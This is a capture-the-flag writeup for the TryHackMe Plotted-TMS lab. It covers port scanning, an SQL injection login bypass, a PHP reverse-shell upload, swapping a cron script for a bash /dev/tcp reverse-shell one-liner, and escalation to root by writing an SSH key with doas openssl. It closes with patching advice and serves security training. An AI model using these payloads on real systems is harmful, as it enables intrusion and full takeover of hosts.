GitHub icon LinkedIn icon d="M6.667 4h18.667c1.467 0 2.667 1.2 2.667 2.667v18.667c0 1.467-1.2 2.667-2.667 2.667H6.667A2.675 2.675 0 0 1 4 25.334V6.667C4 5.2 5.2 4 6.667 4zm16.946 8.44c.64-.533 1.387-1.173 1.72-1.88-.547.28-1.2.453-1.92.547.667-.48 1.>
Writeup - Plotted-TMS (THM)
3 min read

Writeup - Plotted-TMS (THM)

Writeup - Plotted-TMS (THM)
Photo by Edward Howell / Unsplash

This is a writeup for the Plotted-TMS machine from the TryHackMe site.


First, let's start with a scan of our target with the following command:

nmap -sV -T4 -Pn

Three TCP ports are discovered:

  • 22/tcp : SSH port (OpenSSH 8.2)
  • 80/tcp : HTTP web server (Apache 2.4.41)
  • 445/tcp : HTTP web server (Apache 2.4.41)


I start by listing the directories of the site hosted on port 445:

We find a management page that gives us access to an admin login page.

After a few injection tests I finally managed to connect with the following injection:

Username = ' or 1=1;-- -

I now have access to the admin panel of the site.

In this panel I find the Settings page. This page allows to change the font image of the home page of the site. So I try to send a PHP reverse shell.

Then I access it via the following address:

I now have a reverse shell with the user www-data.

After some research I find that the first flag is in the personal folder of the user plot_admin, problem I do not have the right to read it. So I will have to find a way to change the user.

After launching linPeas on the machine I find that every minute a script is launched by the user plot_admin.

I don't have the permissions to change the content of the script, but I have the permissions to change the content of the /var/www/scripts folder. So I will be able to replace the current script, by a custom script allowing me to have a reverse shell as plot_admin.

To do this I use the following commands:

mv tmp
echo "bash -c '/bin/bash -i >& /dev/tcp/ 0>&1'" >
chmod +x

I now have a reverse shell with the user plot_admin and I can get the first flag.

Privilege escalation

I start by listing the SUID files with the following command:

find / -perm -u=s -type f 2>/dev/null

I found a command not very common: doas. This command is an alternative to the sudo command. After some research I find on this site that the config file of this command is at the following address: /etc/doas.conf.

I find that my user can execute the openssl command with admin rights. So I'm looking on GTFOBins for exploits related to this command.

I find that it is possible to write in files, so I will be able to add to ssh key in the authorized_keys file and then connect via SSH to the root account.

To do this I use the following commands:

echo "ssh-rsa [key] kali@kali" | doas openssl enc -out "$FILE"

I now have a shell root shell and can retrieve the last flag.


To patch this host I think it would be necessary to perform a number of actions:

  • Fix the site code to avoid SQL injections (OWASP SQL Injection)
  • Implement code detection in the admin panel image uploads
  • Store CRON scripts in a folder accessible only by the author
  • Do not allow root rights on commands that do not require it